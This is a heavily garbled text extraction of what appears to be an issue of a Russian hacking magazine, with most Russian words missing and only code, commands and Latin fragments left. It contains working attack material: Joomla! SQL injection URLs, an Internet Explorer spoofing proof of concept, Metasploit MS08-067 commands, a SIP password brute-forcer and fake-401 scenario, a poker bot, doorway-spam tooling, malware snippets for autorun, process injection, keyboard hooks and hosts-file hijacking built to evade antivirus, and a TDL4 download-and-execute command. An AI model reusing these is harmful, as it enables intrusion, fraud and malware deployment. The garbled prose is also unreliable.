$x->__objects=array();
echo serialize($x);
?>
, CakePHP.
,
malloc.im/burnedcake.py.
,
CakePHP, POST- security-,
. ,
PHP-.
TARGETS
CakePHP <= 1.3.5, CakePHP <= 1.2.8
SOLUTION
CakePHP
cakephp.org.
03
SQL-
JOOMLA!
BRIEF
,
PHP JavaScript
MySQL. ,
GNU GPL.
Joomla!,
- :).
SQL-
, .
, YGN Ethical
Hacker Group (yehg.net/lab) 1.5.21.
, SQL- Joomla! 1.5.20 XSS.
,
1.5.21.
, YEHG
, , Joomla!
.
SQL- ,
, , .
, ./components/com_weblinks/models/category.php :
function _buildQuery()
{
$filter_order = $this->getState('filter_order');
$filter_order_dir = $this->getState('filter_order_dir');
$filter_order = JFilterInput::clean($filter_order, 'cmd');
$filter_order_dir =
JFilterInput::clean($filter_order_dir, 'word');
// We need to get a list of all
// weblinks in the given category
$query = 'SELECT *' .
return $query;
}
, .
1.6.
EXPLOIT
Joomla! <= 1.5.21:
/index.php?option=com_weblinks&view=category&id=2&filter
_order_Dir=&filter_order=%00'
/index.php?option=com_weblinks&view=category&id=2&filter
_order_Dir='&filter_order=asc
Joomla! 1.6.0:
attacker.in/joomla160/index.php/using-joomla/extensions/
components/content-component/article-category-list/?filter_
order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,&filter_order_
Dir=2&limit=3&limitstart=4
attacker.in/joomla160/index.php/using-joomla/extensions/
components/content-component/article-category-list/?filter_
order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBB,&limit=3&limit
start=4
bing.com
:
JFilterInput::clean filter_order_Dir filter_order,
.
, -
,
.
TARGETS
Joomla! <= 1.5.21, Joomla! 1.6.0
SOLUTION
, joomla.org.
CMS 1.5.22 1.6.0 .
04
MICROSOFT INTERNET EXPLORER
BRIEF
IE, cyber flash.
-.
-
.
-
.
EXPLOIT
PoC HTML-:
<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1252">
<meta http-equiv="REFRESH" content="10;url=http://www.
keyloggeronline.com/index.php">
<title>Spoof</title>
<script>
function myOpen() {
var mywin=open("about:blank", "mywindow",
"location=1,scrollbars=0,width=300,height=290");
mywin.location.href="http://www.keyloggeronline.com/misc/
temp/a.php?http://www.bing.com/" + Array(5).join(" ") + " ";
self.blur();
}
</script>
</head>
<body onclick="myOpen();">
Click anywhere on this page!
</body>
</html>
cyber flash
PoC- keyloggeronline.com/misc/temp/about.htm.
, , bing.com. ,
,
. ,
Internet Explorer (, Download,
,
, - ).
, .
TARGETS
MS Internet Explorer 7, 8, 9
SOLUTION
, , IE,
. z
Dot.err (kaifoflife@bk.ru)
,
,
!
partypoker.com
- .
, . , .
, , -
,
- .
- ,
. ,
, .
. ,
,
partypoker.com :).
Flop aka
, .
//etc. ,
.
, . ,
.
-.
.
, :).
Turn
, :
1.
partypoker.com.
2. -.
3.
.
4. .
,
,
.
.
12801024,
,
,
.
, , ,
. ,
, .
, ,
.
Unit3.cpp.
....
TABLE, :
TABLE table1;
...
-:
table1.position = "1";
...
table1.last_cards = "start";
...
dvd
,
:)
table1.position = Form1->Edit1->Text.c_str();
...
.
. ,
.
P4 2800MHZ, 1 .
while(true) {
Sleep(2000);
:
check_situation(table1.situation, table2.situation,
table3.situation, table4.situation);
Form1->Label34->Caption = table1.situation.c_str();
Form1->Label35->Caption = table2.situation.c_str();
Form1->Label36->Caption = table3.situation.c_str();
Form1->Label37->Caption = table4.situation.c_str();
, , .
.
,
. ,
:
if (table_1_start == "go") {
1.
, .
,
. ,
aka
, .
, ,
.
2.
, .
,
,
.
3. ,
-. ,
,
,
:).
4. , -
,
.
5. .
, :).
DVD
- , :
if (table1.situation=="check" ||
table1.situation == "call_0.10" ||
table1.situation=="call_0.05" ||
table1.situation=="call_many" ||
table1.situation=="allin") {
WARNING
warning
!
.
,
.
INFO
info
, -
,
!
,
-
,
.
table1.combination = "--";
table1.action = "--";
:
check_p_cards( 1, table1.p_card_1, table1.p_card_2);
Form1->Label26->Caption = table1.p_card_1.c_str();
Form1->Label27->Caption = table1.p_card_2.c_str();
check_t_cards( 1,table1.t_card_1,table1.t_card_2,
table1.t_card_3,table1.t_card_4,table1.t_card_5);
Form1->Label11->Caption = table1.t_card_1.c_str();
Form1->Label12->Caption = table1.t_card_2.c_str();
Form1->Label13->Caption = table1.t_card_3.c_str();
Form1->Label14->Caption = table1.t_card_4.c_str();
Form1->Label15->Caption = table1.t_card_5.c_str();
( /
/etc):
check_position(1, table1);
Form1->Label62->Caption = table1.position.c_str();
.
- :
shortstack(1, table1);
table1.action:
Form1->Label38->Caption = table1.action.c_str();
Form1->Label58->Caption = table1.combination.c_str();
, . :
mouse_click(1, table1);
, ,
, .
:
write_stat(1, table1);
, , .
table1.last_cards = table1.p_card_1 + table1.p_card_2;
.
. . outfile_name
, . startX
startY height width.
void PRINT_RECT_SVV (char* outfile_name,
int startX, int startY, int width, int height)
// GetDC
// . 0 -
{
HDC hdc = GetDC(0);
if (hdc) //
{
Graphics::TBitmap* bmp = new Graphics::TBitmap();
__try {
bmp->Width = width;
bmp->Height = height;
// p p hdc bmp,
// pp , SRCCOPY
BitBlt(bmp->Canvas->Handle, 0, 0, width, height,
hdc, startX, startY, SRCCOPY);
bmp->SaveToFile(outfile_name);
// BMP
}
__finally {
delete bmp; //
}
}
}
,
, : ?
,
.
MD5- ,
, .
MD5-
, :
bool CHECK_MD5_SVV (char* ET_file, char* newfile) {
md5wrapper md5;
//
std::string hash1 = md5.getHashFromFile(newfile);
// ,
std::string hash2 = md5.getHashFromFile(ET_file);
//
if (hash1==hash2) return true;
else return false;
}
.
:
void check_this_card (char* new_path, string &card) {
// A
if (CHECK_MD5_SVV(".\\ET\\ET_A_p.bmp", new_path))
{card = "Ap"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_k.bmp", new_path))
{card = "Ak"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_ch.bmp", new_path))
{card = "Ach"; }
else if (CHECK_MD5_SVV(".\\ET\\ET_A_b.bmp", new_path))
{card = "Ab"; }
//
...
else { card = "--"; }
}
( , )
.
, :
void check_p_cards(int table, string &card1, string &card2) {
if (table==1) {
//
PRINT_RECT_SVV(".\\ET\\ch_card1_t1.bmp", 37,150,12,22);
//
PRINT_RECT_SVV(".\\ET\\ch_card2_t1.bmp", 55,150,12,22);
//
check_this_card(".\\ET\\ch_card1_t1.bmp", card1);
//
check_this_card(".\\ET\\ch_card2_t1.bmp", card2);
}
if (table==2) {
...
}
void check_t_cards (int table, string &card1, string &card2,
string &card3, string &card4, string &card5) {
if (table==1) {
PRINT_RECT_SVV(".\\ET\\t1c1.bmp",198,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c2.bmp",249,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c3.bmp",300,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c4.bmp",351,154,12,22);
PRINT_RECT_SVV(".\\ET\\t1c5.bmp",402,154,12,22);
//
check_this_card(".\\ET\\t1c1.bmp", card1);
check_this_card(".\\ET\\t1c2.bmp", card2);
check_this_card(".\\ET\\t1c3.bmp", card3);
check_this_card(".\\ET\\t1c4.bmp", card4);
check_this_card(".\\ET\\t1c5.bmp", card5);
}
if (table==2) {
...
}
.
, , , :
bool is_a_table (int table_number) {
if (table_number==1) {
PRINT_RECT_SVV(".\\ET\\is_a_table_1.bmp",5,5,95,25);
if (CHECK_MD5_SVV(".\\ET\\ET_is_table.bmp",
".\\ET\\is_a_table_1.bmp")) return true;
else return false;
}
if (table_number==2) {
...
,
. , -, , .
void mouse_click (int table_number, TABLE &this_table) {
...
if (this_table.action == "fold") {
SetCursorPos(x+380, y+410);
mouse_event(MOUSEEVENTF_LEFTDOWN, x+380, y+410,0,0);
Sleep(100);
mouse_event(MOUSEEVENTF_LEFTUP, x+380, y+410, 0, 0);
}
...
}
,
TABLE.
,
. , .
: mov ah,86h; mov dx,cx; int 15h.
! , !
,
:).
, .
, , (shortstack). (
, ),
( ).
// ,
if (this_table.t_card_1 == "--") {
// :
if (card_rank(this_table.p_card_1)==
card_rank(this_table.p_card_2)) {
// -
// -
if ((this_table.situation == "call_many")
||(this_table.situation == "allin")) {
//
// , - (all in)
if ((card_rank(this_table.p_card_1)>=9)
&& (this_table.trade_cycle>=2))
{this_table.action = "allin";}
//
//
// all-in
else if (card_rank(this_table.p_card_1)>=10)
{ this_table.action = "allin"; }
else { this_table.action = "fold"; }
//
// ( )
} else if ((this_table.situation == "check")
||(this_table.situation == "call_0.05")||
(this_table.situation == "call_0.10")) {
//
// ( )
...
, . , , .
.
.
,
.
, :).
River: all-in
,
: PartyPoker .
( -!)
- , .
: .
,
.
, . z
CLIENT-SIDE
2004 , ?
2004
, client-side (
, )
2004 ,
.
Flash
Firefox
HTML
Java
Internet
Explorer
2011
, ,
. Flash
.
.
.
,
. ,
Adobe
,
.
. client-side
,
, .
, ,
Google
Chrome
ASLR
DEP
ASLR
DEP
,
. ,
(DEP, ASLR,
SEHOP).
, , .
,
ESET
Sandbox
Flash
IE 8
HTML
IE 7
ASLR
Firefox
ASLR
Kernel
DEP
Java
IE 6
Aggressor
VoIP!
VoIP-
IP- . , .
, , .
.
sipvicious, .
, svmap.py (
), VoIP-, : Cisco, AddPac,
Linksys . , web. , , , , . :). Linksys
web-. ,
.
, .
-,
. ,
... ,
. . ? web, ,
, , username
auth id ( ), .
, , .
, -.
403 ( ),
.
SIP-
, SIP-.
Softswitch (,
Asterisk) REGISTER, ,
contact. 401
Unauthorized, ,
Digest access authentication. nonce realm. nonce
realm ( ), username
( ), digesturi,
md5- response
Softswitch,
. , 200 ,
401. , , , ,
.
, peer,
username, , .
.
/etc/sip.conf
[peru]
type=friend
username=*username *
secret=helloworld
host=dynamic
disallow=all
allow=alaw
allow=ulaw
Wireshark
Submit all Changes. 10 ,
2 ,
INFO
, - . ,
tshark'e ,
info
.
Proxy .
,
Google.
(,
Wireshark). REGISTER response
intitle: Sipura
,
SPA Configuration,
. ,
,
,
CLI sip set debug on .
, ,
.
, , .
.
, goo.gl/Ravuu,
( ,
). ,
.
#!/usr/bin/python
import md5  # module for computing MD5 hashes
#
EN = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#
en = "abcdefghijklmnopqrstuvwxyz"
digits = "1234567890"
space = " "
p = ",.-!?;:'\"/()"
op = "+-*/:^()><="
all_spec = "'~!@#$%^&*-_=+\\|/?.>,>'\";:[]{}"
class ABCIterator:
# ... , :)
# ...
# ,
u=(raw_input('username >> '));
b=(raw_input('realm >> '));
m=(raw_input('method >> '));
d = (raw_input('digestURI >> '));
r = (raw_input('response >> '));
n = (raw_input('nonce >> '));
print u,b,m,d,r,n;
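# HA2 = MD5(method:digestURI); it stays the same for every candidate
ha2= md5.new(m+":"+d).hexdigest();
response=0;
ch=0; # candidate counter
for i in ABCIterator(start_len=1, stop_len=8, abc=digits+en):
    # candidates from length 1 up to length 8 over digits + lowercase letters
    ch = ch+1;
    # print the current candidate every 500000 iterations
    if ch % 500000 == 0: print i;
    # HA1 = MD5(username:realm:candidate)
    ha1 = md5.new(u+":"+b+":"+i).hexdigest();
    response = md5.new(ha1+":"+n+":"+ha2).hexdigest();
    if r == response: # matches the captured response
        print "------------------>", i;
        exit(0);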
, ,
, . :).
, . ,
Proxy, username.
,
realm asterisk, digesturi . ,
REGISTER
401 nonce.
,
( ).
realm, digesturi, username,
REGISTER, nonce
-response,
response . 401 nonce
( sipp). ,
,
:). REGISTER sipp,
:
C sipp nonce.xml
<?xml version="1.0" encoding="ISO-8859-1" ?>
<scenario name="register">
<recv request="REGISTER"/>
<send>
<![CDATA[
SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP [local_ip]:5060;
branch=[branch];received=[remote_ip]
From: *username *
<sip:*username *@*ip c Asterisk*>
To: *username *
<sip:*username *@*ip c Asterisk*>
Call-ID: [call_id]
CSeq: [cseq] REGISTER
Server: Asterisk PBX 1.6.2.13
Allow: INVITE, ACK, CANCEL,
OPTIONS, BYE, REFER, SUBSCRIBE,
NOTIFY, INFO
Supported: replaces, timer
WWW-Authenticate: Digest algorithm=MD5,
realm="asterisk", nonce="17852b0a"
Content-Length: [len]
]]>
</send>
</scenario>
tshark
. , .
, ,
.
, ,
( ), :). z
11
VOIP
VoIP- . ,
. ,
.
,
VoIP . . IP-
extension', . ,
,
. 11 . ?!
,
. ,
, , , . 23 500 ( 315 000
) ,
( ).
. . ,
,
Shadow Communication Company Ltd.
.
SIP-?
VoIP
PBX (private branch exchange) , - , .
,
SIPVicious (sipvicious.org), Python' . , ,
.
1. ( 192.168.1.1/24),
PBX.
[you@box sipvicious]$ ./svmap 192.168.1.1/24
| SIP Device         | User Agent   |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |
( , ,
),
. ,
,
, , .
,
VoIP. Shadow
Communication Company 1 541 187 11 094 167 .
: , VoIP-.
42 .
VoIP-
| 100
| 101
| reqauth
| noauth
|
|
extension 100 !
4. :
, IP- 192.168.1.103,
Asterisk PBX.
2. extension' ( , ) .
.
123!
[you@box sipvicious]$ ./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123       | reqauth        |
,
. -
SIP- (, X-Lite) .
M4g (icq 884888, snipper.ru)
red.Button
, SEO.
,
.
SEO,
.
.
?
, - :).
.
.
,
- . ,
,
,
- .
? :
,
, ,
.
:
,
.
: .
-
- ( )
, , ,
SEO .
, .
red.Button.
- SEO.
, :
,
, ,
,
,
..
, :
1. .
PPS (Pay Per Sale), (, ,
, , , ), PPC (Pay
Per Click) , PPL (Pay Per Lead)
.
.
, - .
,
.
SEO-.
2.
,
.
,
() .
3. .
.
,
, red.Button
.
4. , ,
. ,
, .
,
, KeyWordKeeper.
5. .
6. - SEO . ,
(, ,
), , , ,
.
, , :
(, -
, , ,
);
;
AddUrl ( ).
7.
. , ,
: Site-Auditor,
ControlDoors .
8.
:).
, , .
, .
DVD
dvd
:
: ,
.;
2.3: ;
Magadan Lite: ,
2;
KeyWordKeeper 4.2.4:
;
ControlDoors: ;
Site Auditor:
,
2;
Red.Button
TRANSFORMER:
.
.?
, , .
.
, red.Button ,
2003 .
( Forum Generator),
,
. ,
2008 , -
, ,
. .
red.Button
.
Red.Button TRANSFORMER, .
. PHP 4-5 safe_mode.
:
;
;
FTP;
;
( );
(,
iframe, ajax),
, (c
);
;
;
;
(CP) ( child
porn);
html-, xml- rss-;
, BB-, HTML+BB,
SpamIT Vista VIP;
;
( );
;
;
,
;
;
;
;
;
, , ;
.
WAMP- Denwer.
C:\WebServers\home\
localhost\www http://
localhost.
admin/admin .
.
, : , , , .
:
1. :
: ;
: ;
;
X (
, , ,
1000 ( ,
);
: ;
( );
: , doorway1 (
);
URL / : (, http://doorway.com/doorway);
, , .
, SEO-,
, .
.
2. :
: ( );
: ;
: super_pack_theme (
C:\WebServers\home\localhost\www\yes\
shabs);
: 2-3 ,
2-3 ;
: 1 3%;
CP: ;
: 2 4;
: ;
: JS (!);
: ;
: ,
;
: 5 ;
: 3 7%;
: (map.html), RSS,
sitemap.xml, robots.txt.
. .
.
3. :
: ,
;
: ,
,
;
: ;
: ;
: ,
META Description , ,
, .
!!! ,
.
C:\WebServers\
home\localhost\www, doorway1
http://doorway.com/doorway ( ,
).
? :) ..
, ,
.
, -, ,
, .
-, ,
,
. HTML , .
( ).
, .
, , .
, -: Google PR, (
edu gov), Alexa Rank.
. SEO- .
( , )
.
.
. -
, - , .
SEO! z
(alumni.samara@gmail.com)
60
Windows
, Windows .
.
Windows ?
. !
History
23 2008 Microsoft MS08-067. ,
(958644).
Windows. ,
MS08-067
. , ,
Conficker/Downadup .
Microsoft $250 000 , . !,
. ,
.
Windows nmap,
Metasploit Framework. , nmap, 445, . , ,
? ,
IP- , bgp.he.net Prefixes IP v4.
nmap,
, my_isp.txt,
nmap. , ,
:
nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt
,
, ,
, 2008
... , nmap .
shell:
meterpreter
,
Meterpreter () Windows,
. MP, PHP JAVA. ,
OS Fingerprints . :)
, TCL-
shell- Cisco IOS tclpro.exe .
? :).
MP
Windows-, Metasploit Framework,
:
.
1. bind_meterpreter
.
Meterpretera , .
2. reverse_meterpreter
Meterpretera.
. , IP- (
NAT).
3. find_tag , , Meterpretera
,
. ,
, .
4. bind_tcp cmd.
exe, , ,
Meterpreter`a.
.
.
? ,
nmap, . .
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit> set PAYLOAD windows/vncinject/bind_tcp
PAYLOAD => windows/vncinject/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
, (cmd.exe) ,
, . ,
msf Windows 7,
FrameWork
64- , ( GUI),
.
( ).
.
. , !
, nmap, IP-
Windows 2003 Server
( , , !).
(exploit/windows/smb/ ms08_067_
netapi) bind_meterpreter. Meterpreter, token_adduser,
SYSTEM use priv. ,
,
. -, FTP -
- exploit, Metasploit
, :
.
, .
, Windows,
445
. ,
,
. , ,
, .
, Windows,
. :). z
(icq 884888, snipper.ru)
X-TOOLS
: File Uploader
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Napster
multi-up.com
(, , ).
-
. File Uploader
Napster.
:
4shared.com ( );
d.lsass.us;
depositfiles.com ( );
dump.ru ( );
fileshare.in.ua;
filetrash.ru;
ifolder.ru;
letitbit.net ( );
megaupload.com ( );
multi-up.com;
openfile.ru ( );
rapidshare.com ( );
rapidshare.de ( );
rapidshare.ru ( );
rghost.ru;
sendfile.su;
sendspace.com ( );
slil.ru;
uploadbox.com ( );
uploading.com ( );
yandex.ru ( ).
:
;
;
;
;
(RU/EN);
login/pass
;
;
Drag&Drop;
,
;
;
;
.
: blog.napster2k.tk.
: PHPFastScanner
: *nix/win
: Dr.Z3r0
Reverse-IP
- Reverse-IP
.
. !
PHPFastScanner Reverse-IP
PHP.
Reverse-IP.
:
Reverse-IP ( bing.com);
( 68 );
;
phpinfo, phpmyadmin, sypex dumper;
,
;
;
;
HEAD
( ,
);
;
(
);
Keep-Alive ( );
(
);
, , FAQ.
.
,
. ()
. PHPFastScanner
,
-.
,
][. Dr.Z3r0.
, :
1
- 1 ;
2
- 2 ;
3
- 10 ;
13 . 10
. ,
.
RDot: goo.gl/GaIrD.
: Free Mail
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zdez Bil Ya
).
- ,
: goo.gl/tfSXF.
: QTss-Brute
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: RankoR
(
)
. Free Mail
e-mail
.
:
Mail.ru (mail.ru, bk.ru, list.ru,
inbox.ru);
Rambler.ru;
Atlas.cz (atlas.cz, mujmail.cz);
Centrum.cz;
Bigmir.net;
Km.ru (km.ru, freemail.ru, bossmail.ru,
girlmail.ru, boymail.ru, megabox.ru,
safebox .ru);
Online.ua;
Meta.ua;
Xakep.ru;
I.ua (i.ua, fm.ua, email.ua, 3g.ua);
Yahoo.com;
Pochta.ru (qip.ru, pochta.ru,
hotmail.ru, fromru.com, front.ru,
hotbox.ru, krovatka.su, land.ru,
mail15.com, mail333.com, newmail.ru,
nightmail.ru, nm.ru, pisem.net,
pochtamt.ru, pop3.ru, rbcmail.ru,
smtp.ru).
:
;
;
(
), good.txt;
(
mail.ru);
.
, ,
(,
.
0 , good.txt
.
, .
CheckBox:
1. Code 0: , 0 , .
2. Skip Code Zero: ,
0,
.
!
,
, QTss-Brute, goo.gl/Q8Ujx.
: DValid Checker
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Zimper
, QTss
.
? ,
ActiveX- MS TS AX
Control, metala -
//. ,
Windows
.
:
1. GUI- . C++ Qt.
2. C WinSocke.
- C++ (Qt) C.
:
RDP
5 (
);
IP
3389;
;
, ;
;
10 ;
;
;
- .
,
,
0 (
),
DValid Checker Zimper.
:
;
good
.txt, bad.txt, unknown.txt;
;
6 ;
2 : ( .txt ,
);
;
;
;
.NET Framework.
:
1. Unknown ,
(
);
2. :
Windows XP ;
;
.
: noxzim.com/?p=415. z
MALWARE
.
(
) .
, . ? :
, ,
:
. ,
,
.
,
, ,
, .
, , ,
.
, - !
. AV- Avast, Avira, AVG, Comodo,
ClamAV.
.
Comodo Antivirus
Free, 5.3.181415.1237. Comodo,
,
. Defense+,
.
, Paranoid Mode, , ,
Safe Mode.
:
, ( )
.
.
ClamAV
Immunitet 3.0 ClamAV .
radiobutton
.
, . ,
Windows
hklm\software\windows\currentversion\run. :
wchar_t szFullPath[MAX_PATH] = {0};
GetModuleFileNameW(0, szFullPath, MAX_PATH);
HKEY hKey = 0;
RegOpenKeyW(HKEY_LOCAL_MACHINE,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &hKey);
UINT ExitCode = RegSetKeyValueW(hKey, 0, L"MalwareAutorun",
REG_SZ, szFullPath, lstrlenW(szFullPath) + 1);
.
. ? ,
: Avast Comodo ,
.
, ,
Token ( ).
,
. :
HANDLE hToken = 0;
UINT nReturnCode = 0;
LUID UID = {0};
TOKEN_PRIVILEGES TokenPrivileges = {0};
nReturnCode = OpenProcessToken(GetCurrentProcess(),
TOKEN_ALL_ACCESS, &hToken);
nReturnCode = LookupPrivilegeValueW(0, SE_DEBUG_NAME, &UID);
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Luid = UID;
TokenPrivileges.Privileges[0].Attributes = 0;
nReturnCode = AdjustTokenPrivileges(hToken, false,
&TokenPrivileges, 0, 0, 0);
,
AdjustTokenPrivileges. ? Comodo Avast
, .
.
, ,
.
, . ,
.
-:
UINT nReturnCode = 0;
HANDLE hExplorerProcess = 0,
hSnapshot = 0, hRemoteThread = 0;
PROCESSENTRY32W pe32 = {0};
UINT ExplorerID = 0;
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32FirstW(hSnapshot, &pe32);
if(!lstrcmpiW(pe32.szExeFile, L"explorer.exe"))
ExplorerID = pe32.th32ProcessID;
else
{
for( ; nReturnCode = Process32NextW(hSnapshot, &pe32) ;)
{
if(!lstrcmpiW(pe32.szExeFile, L"iexplore.exe"))
{
ExplorerID = pe32.th32ProcessID;
break;
}
}
}
if(!ExplorerID)
return 0;
CloseHandle(hSnapshot);
hExplorerProcess = OpenProcess(PROCESS_ALL_ACCESS, 0,
ExplorerID);
PVOID pExplorerMemory = VirtualAllocEx(
hExplorerProcess, 0, 0x3000, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
nReturnCode = WriteProcessMemory (hExplorerProcess,
pExplorerMemory, ThreadFunc, 0x1000 ,0);
hRemoteThread = CreateRemoteThread(hExplorerProcess, 0, 0,
(LPTHREAD_START_ROUTINE)
pExplorerMemory, &ExplorerID, 0, 0);
Process32First/Process32Next iexplore.exe. , ,
ID ,
VirtualAllocEx.
ThreadFunc:
static DWORD ThreadFunc(LPVOID lpThreadParameter)
{
return 0;
}
ClamAV . ,
, ,
Avast
, DLL .
LoadLibrary,
HookProc . API SetWindowsHookEx
. DLL . ?
Comodo. Avast,
,
.
.
: hosts
, . ,
, , ,
.
, , , ,
.
:
HMODULE hDll = LoadLibraryW(L"DLL.dll");
PVOID pHookProc = (PVOID)GetProcAddress(hDll, "HookProc");
HHOOK hHook = SetWindowsHookExW(WH_KEYBOARD,
(HOOKPROC)pHookProc, hDll, 0);
DLL:
EXTERN_C __declspec(dllexport) DWORD HookProc(
int code, WPARAM wParam, LPARAM lParam)
{
return CallNextHookEx(0, code, wParam, lParam);
}
,
hosts,
IP-. , hosts:
HANDLE hFile = CreateFileW(
L"C:\\windows\\system32\\drivers\\etc\\hosts",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
HANDLE hMapping = CreateFileMappingW(hFile, 0,
PAGE_READWRITE, 0, 0, 0);
PVOID pHosts = MapViewOfFile(hMapping,
FILE_MAP_ALL_ACCESS, 0, 0, 0);
memcpy(pHosts, MalwareHost, lstrlenA(MalwareHost));
memcpy((char*)pHosts + lstrlenA(MalwareHost),
EndingBytes, sizeof(EndingBytes));
.
ReadFile/WriteFile,
MapViewOfFile, . Avast Comodo, ,
-, .
. , ?
, . ,
drive-by (xakep.ru/post/54161/default.asp)? ,
... z
MALWARE
, Senior malware researcher, ESET
. 1.
TRUE
-
URL
FALSE
3
SEO
BlackHat SEO
,
SEO
,
.
, , , .
,
.
Adware,
, , -
. , ,
, .
Win32/Patched.P
,
,
Win32/Patched.P (ESET).
3. WinSock
__in int flags
);
int recv(
__in SOCKET s,
__out char *buf,
__in int len,
__in int flags
);
int select(
__in int nfds,
__inout fd_set *readfds,
__inout fd_set *writefds,
__inout fd_set *exceptfds,
__in const struct timeval *timeout
);
. 2. -
2008 ,
, , .
Win32/Patched.P :
ws2_32.dll, (,
) MS Windows.
,
ws2_32.dll,
, ,
.
2 -,
, :
int WSASend(
__in SOCKET s,
__in LPWSABUF lpBuffers,
__in DWORD dwBufferCount,
__out LPDWORD lpNumberOfBytesSent,
__in DWORD dwFlags,
__in LPWSAOVERLAPPED lpOverlapped,
__in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
int WSARecv(
__in SOCKET s,
__inout LPWSABUF lpBuffers,
__in DWORD dwBufferCount,
__out LPDWORD lpNumberOfBytesRecvd,
__inout LPDWORD lpFlags,
__in LPWSAOVERLAPPED lpOverlapped,
__in LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
int send(
__in SOCKET s,
__in const char *buf,
__in int len,
Winsock
, GET/POST
.
, .
, WSARecv(),
(. 3).
(. 1).
, , (. 5).
,
. ,
.
TDL4 Win32/Olmarik.AOV
, ,
TDL4 Win32/
Olmarik.AOV,
2011 . , ,
.
x64,
PatchGuard
64- . , -
. ,
Win32/Glupteba (ESET). ,
. ,
Win32/Glupteba TDL4 .
, TDL4
&C :
task_id = 2|10||hxxp://wheelcars.ru/no.exe
:
task_id = [command_id] [encryption_key] [URL]
DownloadAndExecute, ,
. 4. masterhost
. 5.
,
, .
Win32/Glupteba C&C
(. . 7).
.
, .
. 7. Win32Glupteba
. 6.
-,
. -, ,
Masterhost (. 4).
,
. Win32/Glupteba
,
,
. , .
Google AdWords,
,
.
TDL4 ,
, -
.
, Microsoft
Internet Explorer ActiveX- WebBrowser ( -
). ,
.
- . z
Mifrill (mifrill@real.xakep.ru)
Pwn2Own:
CanSecWest
.
BlackHat, HITB, , - . . .
, Pwn2Own
.
,
,
, , .
: Pwn
, Own :).
Pwn2Own , ,
CanSecWest (cansecwest.com).
, IT-,
: ,
. CanSecWest
,
,
IT- (Microsoft, Adobe, BlackBerry,
Intel ). , ,
. (, )
CanSecWest
,
. , ,
.
,
Pwn2Own ,
CanSecWest
2000-. ,
-
Pwn2Own
.
-
TippingPoint,
3Com, HewlettPackard.
,
Pwn2Own . ,
, ,
.
. , white
hat, , -
.
( ) Pwn2Own,
, $100 000 ( , ,
$100 000, $125 000),
$10 000 20 000. TippingPoint
. ,
,
,
.
TippingPoint Zero Day Initiative
(zerodayinitiative.com), Snosoft program (snosoft.blogspot.
com) iDefense Vulnerability Contributor
Program. Pwn2Own ZDI,
.
, TippingPoint ,
. ,
.
CanSecWest 2008
. , TippingPoint 2011
Pwn2Own , .
Pwn2Own 2011
, Pwn2Own
, .
, . , Pwn2Own
GeoHot ,
,
,
Pwn2Own. ,
,
- .
,
TippingPoint. 2011 .
, ? ,
:
,
. , ,
Pwn2Own ( ,
, tippingpoint.com).
. 30
, , . ,
, .
.
, ( ) -, Microsoft Internet Explorer, Apple
Safari, Mozilla Firefox Google Chrome. , Chrome
, 2009 2010 .
, , : Opera?.
Pwn2Own:
. Opera ZDI
. ,
.
64- OS X Windows 7,
,
.
IE, Safari Firefox
$15 000,
Chrome Google
.
, Google, $20
000 CR-48.
,
ZDI $10 000
, Google,
Google Chrome $10 000.
, ,
/, / .
2011 : Sony Vaio (Windows 7),
Alienware m11x (Windows 7), Apple MacBook
Air 13 (Mac OS X Snow Leopard) Google
CR-48 (ChromeOS), , .
.
:
Dell Venue Pro (Windows 7), iPhone 4 (iOS),
Blackberry Torch 9800 (Blackberry 6 OS)
Nexus S (Android).
$15 000.
Pwn2Own , , .
,
.
,
, TippingPoint
:
,
.
.
, ,
Pwn2Own, ,
Safari
.
, , ,
-
Vupen Safari
. Apple ,
, Safari 5.0.4 iOS 4.3.
,
Pwn2Own
,
, . Vupen,
, , , -
,
, .
-
Pwn2Own 2011,
,
, Vupen
Safari
-.
,
, ,
.
,
,
,
.
Internet Explorer 8,
64- Windows 7 SP1.
, Vupen,
Harmony Security
. , Vupen
, IE
Protected mode,
.
, ,
,
.
.
. , 32- IE.
Chrome . ,
2009 2010
, . ,
,
,
- . ,
.
Google
. , ,
,
Chrome html Java.
. ,
2010 iPhone 3GS
-
.
CanSecWest 2007
iPhone 4
BlackBerry Torch.
,
Independent Security
Evaluators. , Apple
,
.
iOS 4.2.1, iOS 4.3
ASLR. ,
:
ASLR, ,
$15 000 iPhone 4 .
, 2010
iPhone. - ,
BlackBerry 6.0.0.246.
BlackBerry
Torch 9800 - -
. RIM
ASLR, DEP ,
.
, , .
,
PlayStation3
Sony.
Dell Venue Windows Phone 7, -
.
, , , :
,
.
,
, Pwn2Own
-
. ,
, . z
c0n Difesa (condifesa@gmail.com, defec.ru)
Positive Technologies
1998 . .
,
, .
XSpider,
Positive Technologies.
. ,
, ,
IT-.
, .
; ,
;
,
, . , , .
,
1998
, .
XSpider Positive Technologies,
.
,
Positive Technologies:
Positive Technologies
( )
